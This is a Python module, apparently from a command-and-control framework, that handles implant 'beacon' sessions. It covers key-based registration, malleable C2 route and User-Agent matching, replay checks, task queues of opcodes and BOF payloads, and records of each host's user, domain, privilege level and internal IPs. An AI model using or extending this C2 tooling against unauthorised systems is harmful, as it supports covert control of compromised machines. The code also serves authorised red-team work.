"""
Beacon Registry and Session Management

Manages beacon sessions, crypto keys, and authentication.
Beacons are pre-registered via known_beacons.json (generated by config_builder.py
at compilation time). Only pre-registered beacons with matching routes,
User-Agents, HTTP methods, and malleable configs are accepted.
"""

import os
import json
import time
import hashlib
import threading
import asyncio
import logging
from collections import deque
from dataclasses import dataclass, field
from typing import Optional, Dict, List, Tuple, Any, Set

from security.replay_protection import LRUCache


logger = logging.getLogger('pandragon.beacon')

MAX_OUTPUT_LOG_SIZE = 10000
MAX_BINARY_OUTPUTS = 1000


@dataclass
class BeaconSession:
    """
    Represents an active beacon session.

    Tracks all state for a connected beacon including encryption keys,
    sequence numbers, task queue, output log, and allowed routes.

    Attributes:
        beacon_id: 8-byte beacon ID as hex string
        crypto_key: 32-byte encryption key
        allowed_routes: Routes this beacon is permitted to use (from known_beacons.json)
        first_seen: When beacon was first registered
        last_seen: Last activity timestamp
        authenticated: Whether beacon has valid pre-shared key (always True for known beacons)
    """
    beacon_id: str
    crypto_key: bytes
    allowed_routes: list = field(default_factory=list)
    first_seen: float = field(default_factory=time.time)
    last_seen: float = field(default_factory=time.time)
    last_seq_num: int = field(default=-1)
    next_task_seq: int = field(default=0)
    seen_nonces: LRUCache = field(default_factory=lambda: LRUCache(1000))
    task_queue: deque = field(default_factory=deque)
    output_log: list = field(default_factory=list)
    binary_outputs: list = field(default_factory=list)
    authenticated: bool = field(default=True)
    pending_list_files_path: str = field(default="")
    malleable_config: dict = field(default_factory=dict)
    key_rotation_pending: bool = field(default=False)
    new_crypto_key: Optional[bytes] = field(default=None)
    _lock: asyncio.Lock = field(default_factory=asyncio.Lock, repr=False, init=False)
    current_task_id: Optional[str] = field(default=None)
    name: str = field(default="")

    os_major: Optional[int] = field(default=None)
    os_minor: Optional[int] = field(default=None)
    os_build: Optional[int] = field(default=None)
    arch: Optional[int] = field(default=None)
    is_wow64: Optional[bool] = field(default=None)
    is_elevated: Optional[bool] = field(default=None)
    is_domain_joined: Optional[bool] = field(default=None)
    pid: Optional[int] = field(default=None)
    process_name: Optional[str] = field(default=None)
    username: Optional[str] = field(default=None)
    computer_name: Optional[str] = field(default=None)
    domain: Optional[str] = field(default=None)
    ram_mb: Optional[int] = field(default=None)
    cpu_cores: Optional[int] = field(default=None)
    ip_count: int = field(default=0)
    internal_ips: list = field(default_factory=list)
    long_running_bofs: list = field(default_factory=list)

    async def touch(self) -> None:
        async with self._lock:
            self.last_seen = time.time()

    async def add_long_running_bof(self, task_id: int, bof_name: str = "") -> None:
        async with self._lock:
            self.long_running_bofs.append({
                "task_id": task_id,
                "bof_name": bof_name,
                "started": time.time(),
                "last_output": time.time()
            })
        logger.debug(f"[{self.beacon_id}] Added long-running BOF: task_id={task_id}")

    async def update_long_running_bof(self, task_id: int) -> None:
        async with self._lock:
            for bof in self.long_running_bofs:
                if bof["task_id"] == task_id:
                    bof["last_output"] = time.time()
                    break

    async def remove_long_running_bof(self, task_id: int) -> bool:
        async with self._lock:
            for i, bof in enumerate(self.long_running_bofs):
                if bof["task_id"] == task_id:
                    del self.long_running_bofs[i]
                    return True
        return False

    async def get_long_running_bofs(self) -> list:
        async with self._lock:
            return list(self.long_running_bofs)

    async def queue_task(self, opcode: int, payload: bytes = b"", task_id: str = None, bof_id: int = None) -> None:
        async with self._lock:
            task_dict = {
                "opcode": opcode,
                "payload": payload,
                "seq_num": self.next_task_seq,
                "task_id": task_id,
                "bof_id": bof_id,
            }
            self.task_queue.append(task_dict)
            self.next_task_seq += 1
        logger.debug(f"[{self.beacon_id}] Queued task: opcode=0x{opcode:02x} seq={self.next_task_seq - 1}")

    async def pop_task(self) -> Optional[dict]:
        async with self._lock:
            return self.task_queue.popleft() if self.task_queue else None

    async def log_output(self, data: bytes, binary_file: dict = None) -> None:
        async with self._lock:
            log_entry = {"time": time.time(), "data": data}
            if binary_file:
                log_entry["binary_file"] = binary_file
                self.binary_outputs.append(binary_file)
                if len(self.binary_outputs) > MAX_BINARY_OUTPUTS:
                    self.binary_outputs = self.binary_outputs[-MAX_BINARY_OUTPUTS:]
            self.output_log.append(log_entry)
            if len(self.output_log) > MAX_OUTPUT_LOG_SIZE:
                self.output_log = self.output_log[-MAX_OUTPUT_LOG_SIZE:]

    async def validate_seq_num(self, seq_num: int) -> bool:
        async with self._lock:
            if self.last_seq_num >= 0xFFFFFFF0:
                if not self.key_rotation_pending:
                    logger.warning(f"[{self.beacon_id}] Sequence wraparound, triggering key rotation")
                    self.key_rotation_pending = True
                    self.new_crypto_key = os.urandom(32)
            if self.last_seq_num > 0xFFFFFFFE:
                if seq_num < 1000:
                    self.last_seq_num = seq_num
                    return True
            if seq_num <= self.last_seq_num:
                logger.warning(f"[{self.beacon_id}] Replay: seq_num={seq_num} <= {self.last_seq_num}")
                return False
            self.last_seq_num = seq_num
            return True

    async def validate_nonce(self, nonce: bytes) -> bool:
        async with self._lock:
            if self.seen_nonces.contains(nonce):
                logger.warning(f"[{self.beacon_id}] Duplicate nonce (replay)")
                return False
            self.seen_nonces.add(nonce)
            return True

    @property
    def seq_num(self) -> int:
        return self.next_task_seq


class BeaconRegistry:
    """
    Registry for beacon sessions.

    Beacons must be pre-registered in known_beacons.json. The file is generated
    by config_builder.py at compilation time and contains each beacon's ID,
    crypto key, and the exact routes it is allowed to use.

    For each incoming request, the server:
    1. Identifies the beacon via packet header or malleable C2 unwrapping
    2. Validates the request path, User-Agent, HTTP method against the
       beacon's allowed_routes
    3. Rejects unknown beacons and unauthorized routes
    """

    def __init__(self, known_beacons_path: str):
        self._known_beacons: Dict[str, dict] = {}
        self._key_to_beacon: Dict[bytes, str] = {}
        self._beacons: Dict[str, BeaconSession] = {}
        self._route_index: Dict[Tuple[str, str, str], List[str]] = {}
        self._lock = asyncio.Lock()
        self._known_beacons_path = known_beacons_path
        self._load_known_beacons()

    # ── Loading ────────────────────────────────────────────────────────────

    def _save_known_beacons(self) -> None:
        """Persist current known_beacons to disk atomically."""
        data = {
            "version": 2,
            "beacons": {
                bid: {
                    "crypto_key": info["crypto_key_hex"],
                    "allowed_routes": info.get("allowed_routes", []),
                }
                for bid, info in self._known_beacons.items()
            },
        }
        import tempfile
        try:
            fd, tmp = tempfile.mkstemp(dir=os.path.dirname(self._known_beacons_path) or ".")
            with os.fdopen(fd, "w") as f:
                json.dump(data, f, indent=2)
            os.replace(tmp, self._known_beacons_path)
        except Exception as e:
            logger.error(f"Failed to save known_beacons: {e}")

    def register_remote(self, beacon_id: str, crypto_key_hex: str, allowed_routes: list) -> list:
        """Register a beacon from a remote operator WebSocket.

        Updates in-memory indexes and persists to disk.
        Returns a list of new HTTP paths that need dynamic route registration.
        """
        if len(crypto_key_hex) != 64:
            raise ValueError("crypto_key must be 64 hex characters")
        crypto_key = bytes.fromhex(crypto_key_hex)

        # Track existing paths to detect new ones
        existing_paths = set(
            r.get("path", "").lstrip("/")
            for r in self._known_beacons.get(beacon_id, {}).get("allowed_routes", [])
            if r.get("transport_type") in ("HTTP", "HTTPS")
        )

        entry = {
            "crypto_key": crypto_key,
            "crypto_key_hex": crypto_key_hex,
            "allowed_routes": allowed_routes,
        }
        self._known_beacons[beacon_id] = entry
        self._key_to_beacon[crypto_key] = beacon_id

        # Update route index
        self._route_index.clear()
        for bid, info in self._known_beacons.items():
            for route in info.get("allowed_routes", []):
                key = (
                    route.get("path", ""),
                    route.get("http_method", "GET"),
                    route.get("transport_type", "http").lower(),
                )
                self._route_index.setdefault(key, []).append(bid)

        self._save_known_beacons()

        # Identify new HTTP paths needing route registration
        new_paths = []
        for route in allowed_routes:
            if route.get("transport_type") in ("HTTP", "HTTPS"):
                path = route.get("path", "").lstrip("/")
                if path and path not in existing_paths:
                    new_paths.append(path)

        logger.info(f"Remote beacon registered: {beacon_id} ({len(allowed_routes)} route(s))")
        return new_paths

    def _load_known_beacons(self) -> None:
        """Load known beacons from known_beacons.json (version 2 format)."""
        path = self._known_beacons_path
        if not os.path.exists(path):
            logger.warning(f"No known beacons file: {path}: all beacons will be rejected")
            return

        try:
            with open(path, 'r') as f:
                data = json.load(f)

            beacons = data.get('beacons', {})
            for beacon_id, info in beacons.items():
                crypto_key_hex = info.get('crypto_key', '')
                if len(crypto_key_hex) != 64:
                    logger.warning(f"Skipping beacon {beacon_id}: invalid crypto_key length")
                    continue
                crypto_key = bytes.fromhex(crypto_key_hex)

                entry = {
                    'crypto_key': crypto_key,
                    'crypto_key_hex': crypto_key_hex,
                    'allowed_routes': info.get('allowed_routes', []),
                }
                self._known_beacons[beacon_id] = entry
                self._key_to_beacon[crypto_key] = beacon_id

                n_routes = len(entry['allowed_routes'])
                logger.info(f"Loaded beacon: {beacon_id} ({n_routes} route(s))")

            logger.info(f"Loaded {len(beacons)} known beacon(s) from {path}")

            # Build route index for O(1) candidate lookup
            self._route_index.clear()
            for bid, info in self._known_beacons.items():
                for route in info.get('allowed_routes', []):
                    key = (
                        route.get('path', ''),
                        route.get('http_method', 'GET'),
                        route.get('transport_type', 'http').lower(),
                    )
                    self._route_index.setdefault(key, []).append(bid)
        except Exception as e:
            logger.error(f"Failed to load known beacons: {e}")

    # ── Route-based candidate lookup ──────────────────────────────────────

    def find_candidates(
        self, path: str, user_agent: str, http_method: str,
        payload_location_type: Optional[str] = None,
        transport_type: str = 'http'
    ) -> List[Tuple[str, dict]]:
        """
        Find beacon candidates whose allowed_routes match the request.

        Each candidate is a (beacon_id, route_info) tuple where route_info
        contains the matching route's malleable_config and crypto key info.

        Uses a route index for O(1) fast-path lookup when the path matches
        an exact route key, then falls back to a linear scan for wildcard
        or query-param-bearing paths.

        Args:
            path: Request URL path
            user_agent: HTTP User-Agent header
            http_method: HTTP method (GET/POST)
            payload_location_type: Optional payload location hint
            transport_type: Transport type (http, https, tcp, pipe)

        Returns:
            List of (beacon_id, route_info) tuples for all matching candidates
        """
        candidates = []

        # Fast path: route index lookup (exact path match)
        key = (path, http_method, transport_type)
        for beacon_id in self._route_index.get(key, []):
            info = self._known_beacons.get(beacon_id)
            if not info:
                continue
            for route in info.get('allowed_routes', []):
                if route.get('path', '') != path:
                    continue
                if route.get('http_method', 'GET') != http_method:
                    continue
                if route.get('transport_type', 'http').lower() != transport_type:
                    continue
                route_ua = route.get('user_agent', '')
                if route_ua and route_ua not in user_agent:
                    continue
                route_info = {
                    'beacon_id': beacon_id,
                    'crypto_key': info['crypto_key'],
                    'crypto_key_hex': info['crypto_key_hex'],
                    'malleable_config': route.get('malleable_config'),
                    'path': route.get('path', ''),
                    'http_method': route.get('http_method', 'GET'),
                    'user_agent': route_ua,
                }
                candidates.append((beacon_id, route_info))

        # Fallback: linear scan for wildcard / query-param paths
        if not candidates:
            for beacon_id, info in self._known_beacons.items():
                for route in info.get('allowed_routes', []):
                    route_path = route.get('path', '')
                    route_ua = route.get('user_agent', '')
                    route_method = route.get('http_method', 'GET')

                    path_matches = (
                        path == route_path or
                        path.startswith(route_path + '?') or
                        path.startswith(route_path + '%3F')
                    )
                    ua_matches = (route_ua in user_agent) if route_ua else True
                    method_matches = (route_method == http_method)

                    if path_matches and ua_matches and method_matches:
                        route_info = {
                            'beacon_id': beacon_id,
                            'crypto_key': info['crypto_key'],
                            'crypto_key_hex': info['crypto_key_hex'],
                            'malleable_config': route.get('malleable_config'),
                            'path': route_path,
                            'http_method': route_method,
                            'user_agent': route_ua,
                        }
                        candidates.append((beacon_id, route_info))

        return candidates

    def get_http_paths(self) -> List[str]:
        """Return unique HTTP(S) paths from all known beacons' allowed_routes."""
        paths: set[str] = set()
        for info in self._known_beacons.values():
            for route in info.get('allowed_routes', []):
                if route.get('transport_type') in ('HTTP', 'HTTPS'):
                    path = route.get('path', '')
                    if path:
                        paths.add(path.lstrip('/'))
        return sorted(paths)

    def find_tcp_candidates(
        self, port: int, remote_ip: str = ""
    ) -> List[Tuple[str, dict]]:
        """
        Find beacon candidates for non-HTTP transports by listening port.

        Non-HTTP transports (TCP, PIPE) don't carry HTTP metadata (path, UA,
        method, headers). Identification relies instead on which local port
        the connection arrived on, and optionally the remote IP.

        Each candidate is a (beacon_id, route_info) tuple where route_info
        contains the crypto key and any prefix/suffix wrapper for unwrapping.

        Args:
            port: Local listening port the connection came in on
            remote_ip: Optional remote IP for narrowing candidates

        Returns:
            List of (beacon_id, route_info) tuples for matching candidates
        """
        candidates = []
        for beacon_id, info in self._known_beacons.items():
            for route in info.get('allowed_routes', []):
                route_type = route.get('transport_type', '')
                if route_type not in ('TCP', 'PIPE'):
                    continue

                route_port = route.get('port', 0)
                if route_port and route_port != port:
                    continue

                # Optional host/IP filter
                route_host = route.get('host', '')
                if (
                    remote_ip
                    and route_host
                    and route_host not in ('0.0.0.0', '::')
                    and route_host != remote_ip
                ):
                    continue

                mc = route.get('malleable_config')
                route_info = {
                    'beacon_id': beacon_id,
                    'crypto_key': info['crypto_key'],
                    'crypto_key_hex': info['crypto_key_hex'],
                    'malleable_config': mc,
                    'transport_type': route_type,
                    'port': route_port,
                }
                candidates.append((beacon_id, route_info))

        return candidates

    # ── Beacon session management ─────────────────────────────────────────

    async def register(self, crypto_key: bytes) -> Optional[BeaconSession]:
        """
        Register a beacon session.

        Only succeeds if the beacon is in known_beacons.json.
        If a session already exists, returns the existing session.

        Args:
            crypto_key: 32-byte encryption key

        Returns:
            BeaconSession if known, None if unknown
        """
        beacon_id = self.derive_beacon_id(crypto_key)
        beacon_id_hex = beacon_id.hex()

        known = self._known_beacons.get(beacon_id_hex)
        if not known:
            logger.warning(f"Unknown beacon rejected: {beacon_id_hex}")
            return None

        async with self._lock:
            if beacon_id_hex not in self._beacons:
                malleable_config = {}
                for route in known.get('allowed_routes', []):
                    if route.get('malleable_config'):
                        malleable_config = route['malleable_config']
                        break

                self._beacons[beacon_id_hex] = BeaconSession(
                    beacon_id=beacon_id_hex,
                    crypto_key=crypto_key,
                    allowed_routes=known.get('allowed_routes', []),
                    authenticated=True,
                    malleable_config=malleable_config,
                )

                for route in known.get('allowed_routes', []):
                    key = (
                        route.get('path', ''),
                        route.get('http_method', 'GET'),
                        route.get('transport_type', 'http').lower(),
                    )
                    if beacon_id_hex not in self._route_index.setdefault(key, []):
                        self._route_index[key].append(beacon_id_hex)

                logger.info(f"Registered known beacon: {beacon_id_hex}")

            await self._beacons[beacon_id_hex].touch()
            return self._beacons[beacon_id_hex]

    async def get_by_beacon_id(self, beacon_id: bytes) -> Optional[BeaconSession]:
        """
        Get or register a beacon by raw beacon_id bytes.

        Only returns a session if the beacon is in known_beacons.json.

        Args:
            beacon_id: 8-byte beacon ID from packet header

        Returns:
            BeaconSession if known, None if unknown
        """
        beacon_id_hex = beacon_id.hex()

        async with self._lock:
            if beacon_id_hex in self._beacons:
                await self._beacons[beacon_id_hex].touch()
                return self._beacons[beacon_id_hex]

            known = self._known_beacons.get(beacon_id_hex)
            if known:
                session = await self.register(known['crypto_key'])
                return session

            logger.warning(f"Unknown beacon ID: {beacon_id_hex}")
            return None

    def get(self, beacon_id: str) -> Optional[BeaconSession]:
        """Get beacon session by ID string."""
        return self._beacons.get(beacon_id)

    def list_beacons(self) -> List[BeaconSession]:
        """List all registered beacon sessions."""
        return list(self._beacons.values())

    async def remove(self, beacon_id: str) -> None:
        """Remove a beacon from the active registry."""
        async with self._lock:
            if beacon_id in self._beacons:
                beacon = self._beacons.pop(beacon_id)
                if beacon.crypto_key in self._key_to_beacon:
                    del self._key_to_beacon[beacon.crypto_key]

                # Clean up route index
                for key in list(self._route_index.keys()):
                    if beacon_id in self._route_index[key]:
                        self._route_index[key].remove(beacon_id)
                        if not self._route_index[key]:
                            del self._route_index[key]

                logger.info(f"Removed beacon session: {beacon_id}")

    def get_known_beacon_ids(self) -> List[str]:
        """List all known beacon IDs (from known_beacons.json)."""
        return list(self._known_beacons.keys())

    def is_route_allowed(self, beacon_id: str, path: str) -> bool:
        """
        Check if a beacon is allowed to use a specific path.

        Args:
            beacon_id: Beacon identifier (hex string)
            path: URL path being requested

        Returns:
            True if the path is in the beacon's allowed_routes
        """
        known = self._known_beacons.get(beacon_id)
        if not known:
            return False
        for route in known.get('allowed_routes', []):
            route_path = route.get('path', '')
            if route_path and (
                path == route_path
                or path.startswith(route_path + '?')
                or path.startswith(route_path + '%3F')
            ):
                return True
        return False

    # ── Key utilities ─────────────────────────────────────────────────────

    @staticmethod
    def derive_beacon_id(crypto_key: bytes) -> bytes:
        """Derive 8-byte beacon ID from crypto key (SHA256 first 8 bytes)."""
        return hashlib.sha256(crypto_key).digest()[:8]

    @staticmethod
    def generate_crypto_key() -> bytes:
        """Generate a random 32-byte encryption key."""
        return os.urandom(32)
